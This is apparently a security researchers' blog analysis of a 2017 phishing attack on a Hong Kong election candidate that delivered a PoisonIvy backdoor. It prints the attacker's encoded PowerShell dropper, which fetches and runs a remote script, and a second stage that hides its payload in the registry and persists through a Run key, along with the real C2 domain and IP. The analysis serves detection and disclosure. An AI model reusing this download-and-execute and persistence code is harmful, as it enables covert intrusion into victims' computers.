On 1 March 2017, one of the candidates has received a phishing mail about a survey form from a gmail account against one of the candidates in chief executive election in Hong Kong and we got the report on 9 March 2017.

Technical Analysis

Game Begins with Multiple Encoding

After clicking over the link, it triggers and downloads an .lnk file and it is redirected to a link under geocities.jp and shows an encoded VBScript as shown as below URL:

hxxp://www.geocities.jp/vbiayay1/<xxxxx>0301.wsc

Exhibit 1

Basically, we carry out the basic VBDecoding and we have the following encoded snippet:

powershell.exe -w hidden -ep bypass -Enc JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwANAAoAJABuAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AA0ACgAkAG4ALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQBbAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwANAAoAJABuAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBnAGUAbwBjAGkAdABpAGUAcwAuAGoAcAAvAHYAYgBpAGEAeQBhAHkAMQAvAE0AZQBlAHQAaQBuAGcAXwBzAHUAbQBtAGEAcgB5AC4AZABvAGMAIgAsACIAJABlAG4AdgA6AHQAZQBtAHAAXABNAGUAZQB0AGkAbgBnAF8AcwB1AG0AbQBhAHIAeQAuAGQAbwBjACIAKQA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAE0AZQBlAHQAaQBuAGcAXwBzAHUAbQBtAGEAcgB5AC4AZABvAGMAIgANAAoASQBFAFgAIAAkAG4ALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBnAGUAbwBjAGkAdABpAGUAcwAuAGoAcAAvAHYAYgBpAGEAeQBhAHkAMQAvAGoAbwBoAG4AdABzADAAMwAwADEALgBwAHMAMQAnACkAOwANAAoA

We simply decode it via Base64 decode and we obtain the following code and target to download the [masked].doc and a powershell script [masked]0301.ps1:

$n=new-object net.webclient;
$n.proxy=[Net.WebRequest]::GetSystemWebProxy();
$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
$n.DownloadFile("http://www.geocities.jp/vbiayay1/<xxxxx>.doc","$env:temp\<xxxxx>.doc");
Start-Process "$env:temp\Meeting_summary.doc"
IEX $n.downloadstring('http://www.geocities.jp/vbiayay1/<0301masked>.ps1');

The [masked]0301.ps1 is shown as below and we try to decode the content in $code:

$is64= $PSHOME.Contains("SysWOW64");
$code = [BASE64 ENCODED STRING];

Set-ItemProperty "HKCU:\Console\" -Name FontSecurity -Value $code;
if ($is64 -or ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8))
{
        Start-Process -windowstyle Hidden -FilePath "$env:windir\syswow64\cmd.exe" -ArgumentList "/c powershell.exe -noprofile -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\console').FontSecurity)))";
        Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\" -Name SecurityUpdate -Value "$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe -w hidden -ep Bypass -nologo -noprofile iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\console').FontSecurity)))";
}else
{
        Start-Process -windowstyle Hidden -FilePath "$env:windir\system32\cmd.exe" -ArgumentList "/c powershell.exe -noprofile -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\console').FontSecurity)))";
        Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\" -Name SecurityUpdate -Value "$env:windir\system32\WindowsPowerShell\v1.0\powershell.exe -w hidden -ep Bypass -nologo -noprofile iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\console').FontSecurity)))";
}

The decoded content in variable $code and find another encrypted string in variable $Shellcode32, which is shown in Appendix section.

C2 Server in Korea

As mentioned above section, we have dumped the content of variable of $Shellcode32, which is final payload is a shellcode in the powershell script

We have turned it into code instructions and figured out the following routine in IDA Pro.

Exhibit 2

We have figured out and decoded the payload with the encryption key 0xE9 against 0x2183:

Once decoded, we have figured out domain and IP address are web.outlooksysm.net/61.97.243.15, which is in a VPS provider in Korea.

Exhibit 3

Footprint of PoisonIvy

From the padding around the C2s in the shellcode matches the findings from Arbor [1]

Meanwhile, from the following highlighted bytes, it matches signature PoisonIvy in Volatility, Plugin, we deduce the backdoor is communicating with the PoisonIvy Server in CnC.

Exhibit 4

Exhibit 5

Meanwhile, it is found the following malware also communicates with the same domain/IP in the past:

Incident Response and Campaign Discovery

We have informed our connection so that Geocities Japan could take down the page and they discover more APT campaigns happened at there in terms of the similar naming convention:

http://www.geocities.jp/vbiayay1/<xxxxx><dddd>.wsc

Summary

It is found that the powershell scripts referenced to the open source PowerSploit in Github as the process injector, meanwhile, it is rare to find such obfuscated code against Hong Kong even though it is encoded with Base64 several times, which is a basic encoding scheme.

Acknowledgement and Credit

We are thankful to the assistance of analysis from Matt Brooks and take down action with Geocitites.jp from Rick from MalwareMustDie.

Reference

  1. Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider with PoisonIvy

  2. Analysis from 0Day.jp


Did you enjoy this post? Want to find out more about us? Contact us

Anthony Lai